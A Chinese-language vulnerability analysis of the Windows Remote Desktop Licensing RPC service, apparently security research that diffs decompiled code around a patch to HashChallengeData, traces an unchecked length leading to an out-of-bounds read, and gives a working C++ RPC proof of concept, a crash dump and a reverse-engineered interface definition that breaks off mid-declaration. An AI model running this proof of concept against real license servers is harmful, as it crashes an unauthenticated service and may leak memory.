Windows Remote Desktop Licensing Service 漏洞解析

鉴于该服务近期出了好几个bug, 学习一下该服务的几个例子.

启用rdp license服务

安装后, 通过资源管理器, 找到端口

其实它是一个rpc服务, 使用rpcview打开该进程:

可以看到, lserver.dll创建的rpc服务, 且flags是0, 意味着无需认证.

在dll处右键, 使用decompile, 会发现报错:

我简单做了些不完全的处理, 具体参考IDL章节.

分析补丁

这里, 我们主要关注HashChallengeData函数

补丁前:

__int64 __fastcall HashChallengeData(
        HCRYPTPROV a1,
        int a2,
        unsigned int a3,
        unsigned __int8 *a4,
        unsigned int a5,
        unsigned __int8 *hHash,
        DWORD pdwDataLen,
        unsigned __int8 **a8,
        unsigned int *a9)
{
  __int64 v10; // rsi
  DWORD LastError; // ebx
  unsigned __int8 *v13; // rdi
  const BYTE *v14; // r14
  BYTE *v15; // rax
  unsigned int *v16; // rcx

  v10 = a3;
  LastError = 0;
  hHash = 0i64;
  pdwDataLen = 0;
  v13 = 0i64;
  if ( !CryptCreateHash(a1, 0x8003u, 0i64, 0, (HCRYPTHASH *)&hHash) )
    goto LABEL_14;
  v14 = a2 == 2 ? L"d46b4bf2-686d-11d2-96ae-00c04fa3080d" : (const BYTE *)L"d63a773e-6799-11d2-96ae-00c04fa3080d";
  if ( !CryptHashData((HCRYPTHASH)hHash, a4, v10, 0) || !CryptHashData((HCRYPTHASH)hHash, v14, 0x48u, 0) )

补丁后:

__int64 __fastcall HashChallengeData(
        HCRYPTPROV hProv,
        int a2,
        unsigned int a3,
        unsigned __int8 *a4,
        unsigned int a5,
        HCRYPTHASH hHash,
        DWORD pdwDataLen,
        unsigned __int8 **a8,
        unsigned int *a9)
{
  __int64 v10; // r14
  DWORD LastError; // ebx
  unsigned __int8 *v14; // rdi
  int v15; // eax
  const BYTE *v16; // r15
  BYTE *v17; // rax
  unsigned int *v18; // rcx

  v10 = a3;
  LastError = 0;
  hHash = 0i64;
  pdwDataLen = 0;
  v14 = 0i64;
  LOBYTE(v15) = EvaluateCurrentState((int **)&g_Feature_1367177530_50463178_FeatureDescriptorDetails);
  if ( v15 && (!hProv || !a4 || a5 - 1 > 0x3F || a5 < (unsigned int)v10) )
    goto LABEL_6;
  if ( !CryptCreateHash(hProv, 0x8003u, 0i64, 0, &hHash) )
    goto LABEL_19;
  v16 = a2 == 2 ? L"d46b4bf2-686d-11d2-96ae-00c04fa3080d" : (const BYTE *)L"d63a773e-6799-11d2-96ae-00c04fa3080d";
  if ( !CryptHashData(hHash, a4, v10, 0) || !CryptHashData(hHash, v16, 0x48u, 0) )

一个显而易见的可能, 就是v10(即a3)比a5大, 导致CryptHashData(hHash, a4, v10, 0)位置越界读取了a4的数据.

它的引用方有多个, 我们关注其中一个TLSRpcChallengeServer

__int64 __fastcall TLSRpcChallengeServer(__int64 a1, unsigned int a2, __int64 a3, _QWORD *a4, __int64 a5, _DWORD *a6)
{
  unsigned __int16 *v10; // rcx
  _DWORD *v11; // r15
  _DWORD *v12; // rsi
  HLOCAL v13; // rdi
  DWORD LastError; // ebx
  __int64 v15; // r15
  HLOCAL v16; // rax
  unsigned int v17; // ebx
  _DWORD *v18; // rbp
  _DWORD *v19; // r13
  void *v20; // rcx
  void *v21; // rcx
  void *v22; // rcx
  void *v23; // rcx
  HCRYPTHASH v25; // [rsp+28h] [rbp-60h]
  unsigned int v26; // [rsp+30h] [rbp-58h]
  HCRYPTPROV phProv; // [rsp+90h] [rbp+8h] BYREF
  unsigned int v28; // [rsp+98h] [rbp+10h]

  v28 = a2;
  v10 = WPP_GLOBAL_Control;
  if ( WPP_GLOBAL_Control != (unsigned __int16 *)&WPP_GLOBAL_Control
    && (*((_DWORD *)WPP_GLOBAL_Control + 7) & 0x1000) != 0 )
  {
    WPP_SF_S(*((_QWORD *)WPP_GLOBAL_Control + 2));
    v10 = WPP_GLOBAL_Control;
  }
  if ( !a1 )
    return 87i64;
  v11 = a6;
  if ( !a6 )
    return 87i64;
  v12 = 0i64;
  v13 = 0i64;
  phProv = 0i64;
  if ( v10 != (unsigned __int16 *)&WPP_GLOBAL_Control && (v10[14] & 0x20) != 0 )
    WPP_SF_S(*((_QWORD *)v10 + 2));
  _InterlockedIncrement((volatile signed __int32 *)(a1 + 8));
  if ( !*(_DWORD *)(a1 + 20) )
  {
    if ( a3 && a4 && (v15 = a5) != 0 )
    {
      if ( *(_DWORD *)a3 != 0x10000 || !*(_DWORD *)(a3 + 8) || !*(_QWORD *)(a3 + 16) )
      {
        LastError = -1073676256;
        goto LABEL_47;
      }
      v13 = LocalAlloc(0x40u, 0x20ui64);
      if ( !v13 )
        goto LABEL_18;
      v12 = LocalAlloc(0x40u, 0x28ui64);
      if ( !v12 )
        goto LABEL_18;
      v16 = LocalAlloc(0x40u, 0x28ui64);
      *(_QWORD *)v15 = v16;
      if ( !v16 )
        goto LABEL_18;
      v17 = HashChallengeData(
              g_hCryptProv,
              a2,
              *(_DWORD *)(a3 + 4),
              *(unsigned __int8 **)(a3 + 16),
              *(_DWORD *)(a3 + 8),
              v25,
              v26,
              (unsigned __int8 **)v13 + 1,
              (unsigned int *)v13 + 1);

可以知道, HashChallengeData的a3, a4, a5都来自于TLSRpcChallengeServer函数的参数a3结构体的数据.

逆向a3的构造函数后, 得知它的结构体形如:

struct uknow1 {
    int f1;
    int f2;
    int f3;
    int f4;
    [size_is(f3)] unsigned char* buff;
    int f18;
    int f1c;
    [size_is(f18)] unsigned char* buff2;
};

构造poc

创建一个rpc的client, 如何创建可以参考我的rpc介绍里的示例项目.

另外, 因为函数参数需要一个handle, 我们还需要调用Proc1_TLSRpcConnect来获取handle.

int main(){
    RPC_STATUS status;
    unsigned char* szStringBinding = NULL;

    status = RpcStringBindingCompose(
        NULL, // UUID to bind to.
        reinterpret_cast<unsigned char*>("ncacn_ip_tcp"), // Use TCP/IP
        // protocol.
        reinterpret_cast<unsigned char*>("192.168.150.104"), // TCP/IP network
        // address to use.
        reinterpret_cast<unsigned char*>("49683"), // TCP/IP port to use.
        NULL, // Protocol dependent network options to use.
        &szStringBinding); // String binding output.

    if (status)
        exit(status);

    status = RpcBindingFromStringBinding(
        szStringBinding, // The string binding to validate.
        &hExample1Binding); // Put the result in the implicit binding
    // handle defined in the IDL file.

    if (status)
        exit(status);
        struct uknow1* s1, * s3 = NULL;
    struct uknow2 *s2 = NULL;
    s1 = (struct uknow1*)calloc(0x1000, 1);
    printf("start\n");
    //for (i = 1; i < 2; i++) {
    RpcTryExcept
    {
        long out  = 0 ;
        s1->buff = (unsigned char *)calloc(0x1000,1);
        s1->f1 = 0x10000;
        s1->f2 = 0x1000000;// 给出超大的偏移值.
        s1->f3 = 0x100;
        void* handle;
        s1->f18 = 0x10;
        s1->buff2 = s1->buff + 0x20;

        Proc1_TLSRpcConnect(&handle);
        Proc44_TLSRpcChallengeServer(handle, 2, s1, &s2, &s3, &out);
    }
    RpcExcept(1)// RPC_S_CANNOT_SUPPORT
    {
        std::cerr << "Runtime reported exception " << RpcExceptionCode()
            << std::endl;
    }RpcEndExcept
}

触发崩溃:

0:010> k
 # Child-SP          RetAddr               Call Site
00 000000d7`f68fe7c0 00007ff9`67e0ad69     bcryptPrimitives!SymCryptMd5AppendBlocks+0x90
01 000000d7`f68fe8b0 00007ff9`67e0ab66     bcryptPrimitives!MSCryptHashDataInternal+0xc9
02 000000d7`f68fe920 00007ff9`670347bf     bcryptPrimitives!MSCryptHashData+0x76
03 000000d7`f68fe9e0 00007ff9`66730738     bcrypt!BCryptHashData+0xbf
04 000000d7`f68fea30 00007ff9`66de3523     rsaenh!CPHashData+0x118
05 000000d7`f68fea70 00007ff9`56b54d2d     CRYPTSP!CryptHashData+0x93
06 000000d7`f68feaf0 00007ff9`56b0c159     lserver!HashChallengeData+0x81
07 000000d7`f68feb40 00007ff9`69471913     lserver!TLSRpcChallengeServer+0x199
08 000000d7`f68febe0 00007ff9`6947618e     RPCRT4!Invoke+0x73
09 000000d7`f68fec50 00007ff9`69425cdc     RPCRT4!Ndr64StubWorker+0x6ee
0a 000000d7`f68ff260 00007ff9`69423897     RPCRT4!NdrServerCallAll+0x3c
0b 000000d7`f68ff2b0 00007ff9`69423842     RPCRT4!DispatchToStubInCNoAvrf+0x17
0c 000000d7`f68ff300 00007ff9`693d60f4     RPCRT4!DispatchToStubInCAvrf+0x12
0d 000000d7`f68ff330 00007ff9`693d52b4     RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x194
0e 000000d7`f68ff400 00007ff9`693eb61a     RPCRT4!RPC_INTERFACE::DispatchToStub+0x1f4
0f 000000d7`f68ff6a0 00007ff9`693eb3c1     RPCRT4!OSF_SCALL::DispatchHelper+0x13a
10 000000d7`f68ff7c0 00007ff9`693ea0d9     RPCRT4!OSF_SCALL::DispatchRPCCall+0x89
11 000000d7`f68ff7f0 00007ff9`693e9c0a     RPCRT4!OSF_SCALL::ProcessReceivedPDU+0xe1
12 000000d7`f68ff890 00007ff9`693e8a5a     RPCRT4!OSF_SCALL::BeginRpcCall+0xba
13 000000d7`f68ff8d0 00007ff9`694007ec     RPCRT4!OSF_SCONNECTION::ProcessReceiveComplete+0x13e
14 000000d7`f68ff9d0 00007ff9`67b15891     RPCRT4!CO_ConnectionThreadPoolCallback+0xbc
15 000000d7`f68ffa50 00007ff9`6a414037     KERNELBASE!BasepTpIoCallback+0x51
16 000000d7`f68ffaa0 00007ff9`6a3c82de     ntdll!TppIopExecuteCallback+0x1b7
17 000000d7`f68ffb20 00007ff9`6912dbe7     ntdll!TppWorkerThread+0x57e
18 000000d7`f68ffe80 00007ff9`6a49a95c     KERNEL32!BaseThreadInitThunk+0x17
19 000000d7`f68ffeb0 00000000`00000000     ntdll!RtlUserThreadStart+0x2c
0:010> r
rax=00000000bdf74b49 rbx=000000009a7acdc5 rcx=0000025a971eefd0
rdx=0000000068d7aa64 rsi=00000000727b464c rdi=00000000757453a6
rip=00007ff967e0b290 rsp=000000d7f68fe7c0 rbp=0000000000000000
 r8=000000003cdad4db  r9=00000000db87fbfa r10=00000000e1a806c7
r11=00000000bdf74b49 r12=00000000971a8c30 r13=0000000000000000
r14=0000025a971e1008 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
bcryptPrimitives!SymCryptMd5AppendBlocks+0x90:
00007ff9`67e0b290 418b56f8        mov     edx,dword ptr [r14-8] ds:0000025a`971e1000=????????

IDL

[
    uuid(3d267954-eeb7-11d1-b94e-00c04fa3080d),
        version(1.0),
]
interface Example1
{

    error_status_t Proc0_TLSRpcGetVersion(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1);

    error_status_t Proc1_TLSRpcConnect(
        [out][context_handle] void** arg_1);

    error_status_t Proc2_TLSRpcDisconnect(
        [in][out][context_handle] void** arg_0);

    error_status_t Proc3_TLSRpcSendServerCertificate(
        [in][context_handle] void* arg_0,
        [in][range(0, 16384)] long arg_1,
        [in][ref][size_is(arg_1)]/*[range(0,16384)]*/ byte* arg_2,
        [in][out]long* arg_3);

    error_status_t Proc4_TLSRpcGetServerName(
        [in][context_handle] void* arg_0,
        [in][out][string]/*[range(0,256)]*/  wchar_t* arg_1,
        [in][out]/*[range(0,256)] */long* arg_2,
        [in][out]long* arg_3);

    error_status_t Proc5_TLSRpcGetServerScope(
        [in][context_handle] void* arg_0,
        [in][out][string]/*[range(0,256)]*/  wchar_t* arg_1,
        [in][out]/*[range(0,256)] */long* arg_2,
        [in][out]long* arg_3);

    error_status_t Proc6_TLSRpcGetInfo(
        [in][context_handle] void* arg_0,
        [in][range(0, 16384)] long arg_1,
        [in][ref][size_is(arg_1)]/*[range(0,16384)]*/ byte* arg_2,
        [out]long* arg_3,
        [out][ref]/*[range(0,0)]*/ byte** arg_4,
        [out]long* arg_5,
        [out][ref]/*[range(0,0)]*/ byte** arg_6,
        [in][out]long* arg_7);

    error_status_t Proc7_TLSRpcIssuePlatformChallenge(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [out]long* arg_2,
        [out]long* arg_3,
        [out][ref]/*[range(0,0)]*/ byte** arg_4,
        [in][out]long* arg_5);

    error_status_t Proc8_TLSRpcRequestNewLicense(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]char* arg_2,
        [in][string] wchar_t* arg_3,
        [in][string] wchar_t* arg_4,
        [in][range(0, 16384)] long arg_5,
        [in][ref][size_is(arg_5)]/*[range(0,16384)]*/ byte* arg_6,
        [in]long arg_7,
        [out]long* arg_8,
        [out][ref][size_is(, *arg_8)]/*[range(0,0)]*/ byte** arg_9,
        [in][out]long* arg_10);

    error_status_t Proc9_TLSRpcUpgradeLicense(
        [in][context_handle] void* arg_0,
        [in]char* arg_1,
        [in]long arg_2,
        [in]long arg_3,
        [in][ref][size_is(arg_3)]/*[range(0,0)]*/ byte* arg_4,
        [in][range(0, 16384)] long arg_5,
        [in][ref][size_is(arg_5)]/*[range(0,16384)]*/ byte* arg_6,
        [out]long* arg_7,
        [out][ref]/*[range(0,0)]*/ byte** arg_8,
        [in][out]long* arg_9);

    error_status_t Proc10_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in][string] wchar_t* arg_1,
        [in]char* arg_2,
        [in][out]long* arg_3,
        [in][out]long* arg_4);

    error_status_t Proc11_TLSRpcGetLastError(
        [in][context_handle] void* arg_0,
        [in][out]/*[range(0,256)] */long* arg_1,
        [in][out][string]/*[range(0,256)]*/  wchar_t* arg_2,
        [in][out]long* arg_3);

    error_status_t Proc12_TLSRpcKeyPackEnumBegin(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]long arg_2,
        [in]char* arg_3,
        [in][out]long* arg_4);

    error_status_t Proc13_TLSRpcKeyPackEnumNext(
        [in][context_handle] void* arg_0,
        [out]char* arg_1,
        [in][out]long* arg_2);

    error_status_t Proc14_TLSRpcKeyPackEnumEnd(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1);

    error_status_t Proc15_TLSRpcKeyPackAdd(
        [in][context_handle] void* arg_0,
        [in][out]char* arg_1,
        [in][out]long* arg_2);

    error_status_t Proc16_TLSRpcKeyPackSetStatus(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]char* arg_2,
        [in][out]long* arg_3);

    error_status_t Proc17_TLSRpcLicenseEnumBegin(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]long arg_2,
        [in]char* arg_3,
        [in][out]long* arg_4);

    error_status_t Proc18_TLSRpcLicenseEnumNext(
        [in][context_handle] void* arg_0,
        [out]char* arg_1,
        [in][out]long* arg_2);

    error_status_t Proc19_TLSRpcLicenseEnumEnd(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1);

    error_status_t Proc20_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]char* arg_2,
        [in][out]long* arg_3);

    error_status_t Proc21_TLSRpcGetAvailableLicenses(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]char* arg_2,
        [out]long* arg_3,
        [in][out]long* arg_4);

    error_status_t Proc22_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1,
        [out][ref] /* [DBG] FC_BOGUS_ARRAY */ /*[range(0,0)]*/  /*  */ char** arg_2,
        [in][out]long* arg_3);

    error_status_t Proc23_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1,
        [out][ref] /* [DBG] FC_BOGUS_ARRAY */ /*[range(0,0)]*/  /*  */ char** arg_2,
        [in][out]long* arg_3);

    error_status_t Proc24_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]long arg_2,
        [in][out]long* arg_3);

    error_status_t Proc25_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]long arg_2,
        [in]long arg_3,
        [in][out]long* arg_4);

    error_status_t Proc26_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]char arg_2,
        [in]char arg_3,
        [in]long arg_4,
        [in][out]char* arg_5,
        [in][out]long* arg_6);

    error_status_t Proc27_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in][string] wchar_t* arg_1,
        [in][string] wchar_t* arg_2,
        [in][string] wchar_t* arg_3,
        [in][out]long* arg_4);

    error_status_t Proc28_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in][string] wchar_t* arg_1,
        [in][string] wchar_t* arg_2,
        [in][range(0, 16384)] long arg_3,
        [in][ref][size_is(arg_3)]/*[range(0,16384)]*/ byte* arg_4,
        [in][out]char* arg_5,
        [in][out]long* arg_6);

    error_status_t Proc29_RdlsJetDBConnection__CleanupKeyPackDescriptions(
        [in][context_handle] void* arg_0);

    error_status_t Proc30_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in]char* arg_1,
        [in][out]long* arg_2);

    error_status_t Proc31_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]char* arg_2,
        [in][out]long* arg_3);

    error_status_t Proc32_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in][out]char* arg_1,
        [in][out]long* arg_2);

    error_status_t Proc33_RdlsJetDBConnection__CleanupKeyPackDescriptions(
        [in][context_handle] void* arg_0);

    error_status_t Proc34_TLSRpcRequestTermServCert(
        [in][context_handle] void* arg_0,
        [in][ref]char* arg_1,
        [in][out]long* arg_2,
        [out][ref]/*[range(0,0)]*/ byte** arg_3,
        [in][out]long* arg_4);

    error_status_t Proc35_TLSRpcRetrieveTermServCert(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in][ref][size_is(arg_1)]/*[range(0,0)]*/ byte* arg_2,
        [in][out]long* arg_3,
        [out][ref]/*[range(0,0)]*/ byte** arg_4,
        [in][out]long* arg_5);

    error_status_t Proc36_TLSRpcInstallCertificate(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]long arg_2,
        [in][range(0, 16384)] long arg_3,
        [in][ref][size_is(arg_3)]/*[range(0,16384)]*/ byte* arg_4,
        [in][range(0, 16384)] long arg_5,
        [in][ref][size_is(arg_5)]/*[range(0,16384)]*/ byte* arg_6,
        [in][out]long* arg_7);

    error_status_t Proc37_TLSRpcGetServerCertificate(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [out][ref]/*[range(0,0)]*/ byte** arg_2,
        [out]long* arg_3,
        [in][out]long* arg_4);

    error_status_t Proc38_TLSRpcRegisterLicenseKeyPack(
        [in][context_handle] void* arg_0,
        [in][ref][size_is(arg_2)]/*[range(0,0)]*/ byte* arg_1,
        [in]long arg_2,
        [in][ref][size_is(arg_4)]/*[range(0,0)]*/ byte* arg_3,
        [in]long arg_4,
        [in][ref][size_is(arg_6)]/*[range(0,0)]*/ byte* arg_5,
        [in]long arg_6,
        [in][out]long* arg_7);

    error_status_t Proc39_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in][out]long* arg_2,
        [out][ref]/*[range(0,0)]*/ byte** arg_3,
        [in][out]long* arg_4);

    error_status_t Proc40_TLSRpcAnnounceServer(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]char* arg_2,
        [in][string] wchar_t* arg_3,
        [in][string] wchar_t* arg_4,
        [in][string] wchar_t* arg_5,
        [in][out]long* arg_6);

    error_status_t Proc41_TLSRpcLookupServer(
        [in][context_handle] void* arg_0,
        [in][string] wchar_t* arg_1,
        [in][out][string]/*[range(0,256)]*/  wchar_t* arg_2,
        [in][out]/*[range(0,256)] */long* arg_3,
        [in][out][string]/*[range(0,256)]*/  wchar_t* arg_4,
        [in][out]/*[range(0,256)] */long* arg_5,
        [in][out][string]/*[range(0,256)]*/  wchar_t* arg_6,
        [in][out]/*[range(0,256)] */long* arg_7,
        [in][out]long* arg_8);

    error_status_t Proc42_TLSRpcAnnounceLicensePack(
        [in][context_handle] void* arg_0,
        [in]char* arg_1,
        [in][out]long* arg_2);

    error_status_t Proc43_TLSRpcReturnLicensedProduct(
        [in][context_handle] void* arg_0,
        [in]char* arg_1,
        [in][out]long* arg_2);

    struct uknow1 {
        int f1;
        int f2;
        int f3;
        int f4;
        [size_is(f3)] unsigned char* buff;
        int f18;
        int f1c;
        [size_is(f18)] unsigned char* buff2;
    };

    struct uknow2 {
        int f1;
        int size;
        [size_is(size)]char* buff;
        int size2;
        [size_is(size2)]char* buff2;
        int f1c;// pad
    };
    error_status_t Proc44_TLSRpcChallengeServer(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]struct uknow1* arg_2,
        [out][ref]struct uknow2** arg_3,
        [out][ref]struct uknow1** arg_4,
        [in][out]long* arg_5);

    error_status_t Proc45_TLSRpcResponseServerChallenge(
        [in][context_handle] void* arg_0,
        [in]char* arg_1,
        [in][out]long* arg_2);

    error_status_t Proc46_TLSRpcGetTlsPrivateData(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in][ref]char* arg_2,
        [out]long* arg_3,
        [out][ref] char** arg_4,
        [out]long* arg_5);

    error_status_t Proc47_TLSRpcSetTlsPrivateData(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in][ref]char* arg_2,
        [out]long* arg_3);

    error_status_t Proc48_TLSRpcTriggerReGenKey(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [out]long* arg_2);

    error_status_t Proc49_TLSRpcTelephoneRegisterLKP(
        [in][context_handle] void* arg_0,
        [in][range(0, 16384)] long arg_1,
        [in][ref][size_is(arg_1)]/*[range(0,16384)]*/ byte* arg_2,
        [out]long* arg_3);

    error_status_t Proc50_TLSRpcAllocateInternetLicense(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]char* arg_2,
        [in][string] wchar_t* arg_3,
        [in][string] wchar_t* arg_4,
        [in][range(0, 16384)] long arg_5,
        [in][ref][size_is(arg_5)]/*[range(0,16384)]*/ byte* arg_6,
        [out]long* arg_7,
        [out][ref]/*[range(0,0)]*/ byte** arg_8,
        [in][out]long* arg_9);

    error_status_t Proc51_TLSRpcAllocateInternetLicenseEx(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]char* arg_2,
        [in][string] wchar_t* arg_3,
        [in][string] wchar_t* arg_4,
        [in][range(0, 16384)] long arg_5,
        [in][ref][size_is(arg_5)]/*[range(0,16384)]*/ byte* arg_6,
        [out]char* arg_7,
        [out]long* arg_8);

    error_status_t Proc52_TLSRpcReturnInternetLicenseEx(
        [in][context_handle] void* arg_0,
        [in]char* arg_1,
        [in]char* arg_2,
        [in]long arg_3,
        [in][out]long* arg_4);

    error_status_t Proc53_TLSRpcReturnInternetLicense(
        [in][context_handle] void* arg_0,
        [in][range(0, 16384)] long arg_1,
        [in][ref][size_is(arg_1)]/*[range(0,16384)]*/ byte* arg_2,
        [in][out]long* arg_3);

    error_status_t Proc54_TLSRpcRequestNewLicenseEx(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1,
        [in]long arg_2,
        [in]char* arg_3,
        [in][string] wchar_t* arg_4,
        [in][string] wchar_t* arg_5,
        [in][range(0, 16384)] long arg_6,
        [in][ref][size_is(arg_6)]/*[range(0,16384)]*/ byte* arg_7,
        [in]long arg_8,
        [in]long arg_9,
        [out]long* arg_10,
        [out][ref]/*[range(0,0)]*/ byte** arg_11,
        [in][out]long* arg_12);

    error_status_t Proc55_TLSRpcUpgradeLicenseEx(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1,
        [in]char* arg_2,
        [in]long arg_3,
        [in]long arg_4,
        [in][ref][size_is(arg_4)]/*[range(0,0)]*/ byte* arg_5,
        [in][range(0, 16384)] long arg_6,
        [in][ref][size_is(arg_6)]/*[range(0,16384)]*/ byte* arg_7,
        [in]long arg_8,
        [out]long* arg_9,
        [out][ref]/*[range(0,0)]*/ byte** arg_10,
        [in][out]long* arg_11);

    error_status_t Proc56_TLSRpcMarkLicense(
        [in][context_handle] void* arg_0,
        [in]char arg_1,
        [in][range(0, 16384)] long arg_2,
        [in][ref][size_is(arg_2)]/*[range(0,16384)]*/ byte* arg_3,
        [in][out]long* arg_4);

    error_status_t Proc57_TLSRpcCheckLicenseMark(
        [in][context_handle] void* arg_0,
        [in][range(0, 16384)] long arg_1,
        [in][ref][size_is(arg_1)]/*[range(0,16384)]*/ byte* arg_2,
        [out]char* arg_3,
        [in][out]long* arg_4);

    error_status_t Proc58_TLSRpcGetSupportFlags(
        [in][context_handle] void* arg_0,
        [out]long* arg_1);

    error_status_t Proc59_TLSRpcRequestNewLicenseExEx(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1,
        [in]long arg_2,
        [in]char* arg_3,
        [in][string] wchar_t* arg_4,
        [in][string] wchar_t* arg_5,
        [in][range(0, 16384)] long arg_6,
        [in][ref][size_is(arg_6)]/*[range(0,16384)]*/ byte* arg_7,
        [in]long arg_8,
        [in]long arg_9,
        [in][out]long* arg_10,
        [out]long* arg_11,
        [out][ref]/*[range(0,0)]*/ byte** arg_12,
        [in][out]long* arg_13);

    error_status_t Proc60_TLSRpcGetServerNameEx(
        [in][context_handle] void* arg_0,
        [in][out][string]/*[range(0,256)]*/  wchar_t* arg_1,
        [in][out]/*[range(0,256)] */long* arg_2,
        [in][out]long* arg_3);

    error_status_t Proc61_TLSRpcLicenseEnumNextEx(
        [in][context_handle] void* arg_0,
        [out]char* arg_1,
        [in][out]long* arg_2);

    error_status_t Proc62_TLSRpcGenerateCustomerCert(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in]long arg_2,
        [in] /* [DBG] FC_BOGUS_ARRAY */[size_is(arg_2)]/*[range(0,0)]*/  /*  */ char arg_3[],
        [out]long* arg_4,
        [out][ref]/*[range(0,0)]*/ byte** arg_5,
        [out]long* arg_6);

    error_status_t Proc63_TLSRpcGetServerNameFixed(
        [in][context_handle] void* arg_0,
        [out][ref][string] wchar_t** arg_1,
        [in][out]long* arg_2);

    error_status_t Proc64_TLSRpcGetServerScopeFixed(
        [in][context_handle] void* arg_0,
        [out][ref][string] wchar_t** arg_1,
        [in][out]long* arg_2);

    error_status_t Proc65_TLSRpcGetLastErrorFixed(
        [in][context_handle] void* arg_0,
        [out][ref][string] wchar_t** arg_1,
        [in][out]long* arg_2);

    error_status_t Proc66_TLSRpcLookupServerFixed(
        [in][context_handle] void* arg_0,
        [in][string] wchar_t* arg_1,
        [out][ref][string] wchar_t** arg_2,
        [out][ref][string] wchar_t** arg_3,
        [out][ref][string] wchar_t** arg_4,
        [in][out]long* arg_5);

    error_status_t Proc67_TLSRpcTriggerReGenKeyNoWarning(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [out]long* arg_2);

    error_status_t Proc68_TLSRpcIssuePerUserLicense(
        [in][context_handle] void* arg_0,
        [in][out]long* arg_1,
        [in]char* arg_2,
        [in][string] wchar_t* arg_3,
        [in][string] wchar_t* arg_4,
        [in][string] wchar_t* arg_5,
        [in][out]long* arg_6);

    error_status_t Proc69_TLSRpcReportEnumBegin(
        [in][context_handle] void* arg_0,
        [out]long* arg_1);

    error_status_t Proc70_TLSRpcReportEnumNext(
        [in][context_handle] void* arg_0,
        [out]char* arg_1,
        [out]long* arg_2);

    error_status_t Proc71_TLSRpcReportEnumEnd(
        [in][context_handle] void* arg_0,
        [out]long* arg_1);

    error_status_t Proc72_TLSRpcFetchReportBegin(
        [in][context_handle] void* arg_0,
        [in]char* arg_1,
        [in]long arg_2,
        [out]long* arg_3);

    error_status_t Proc73_TLSRpcAllocateConcurrentLicense(
        [in][context_handle] void* arg_0,
        [in][out]/*[range(0,16384)] */long* arg_1,
        [out]/*[range(0,16384)]*/ char *arg_2,
        [out]long* arg_3);

    error_status_t Proc74_TLSRpcFetchReportEnd(
        [in][context_handle] void* arg_0,
        [out]long* arg_1);

    error_status_t Proc75_TLSRpcReportGenerateBegin(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [in][string] wchar_t* arg_2,
        [in]long arg_3,
        [out]char* arg_4,
        [out]long* arg_5);

    error_status_t Proc76_TLSRpcReportGenerateCancel(
        [in][context_handle] void* arg_0,
        [out]long* arg_1);

    error_status_t Proc77_TLSRpcReportDelete(
        [in][context_handle] void* arg_0,
        [in]char* arg_1,
        [out]long* arg_2);

    error_status_t Proc78_TLSRpcIsFreeKeyPackInstalled(
        [in][context_handle] void* arg_0,
        [out]long* arg_1,
        [out]long* arg_2);

    error_status_t Proc79_TLSRpcIsServerInDomain(
        [in][context_handle] void* arg_0,
        [out]long* arg_1,
        [out]long* arg_2);

    error_status_t Proc80_TLSRpcRevokeLicense(
        [in][context_handle] void* arg_0,
        [in]char* arg_1,
        [out]long* arg_2,
        [out]long* arg_3,
        [out]char* arg_4,
        [out]long* arg_5);

    error_status_t Proc81_TLSRpcIsLSPublished(
        [in][context_handle] void* arg_0,
        [out]long* arg_1,
        [out]long* arg_2);

    error_status_t Proc82_TLSRpcPublishLS(
        [in][context_handle] void* arg_0,
        [out]long* arg_1);

    error_status_t Proc83_TLSRpcUnpublishLS(
        [in][context_handle] void* arg_0,
        [out]long* arg_1);

    error_status_t Proc84_TLSRpcChangeRole(
        [in][context_handle] void* arg_0,
        [in]long arg_1,
        [out]long* arg_2);

    error_status_t Proc85_TLSRpcIsGPEnabled(
        [in][context_handle] void* arg_0,
        [out]long* arg_1,
        [out]long* arg_2);

    error_status_t Proc86_TLSRpcLocalGroupForGPPresent(
        [in][context_handle] void* arg_0,
        [out]long* arg_1,
        [out]long* arg_2);

    error_status_t Proc87_TLSRpcCreateLocalGroupForGP(
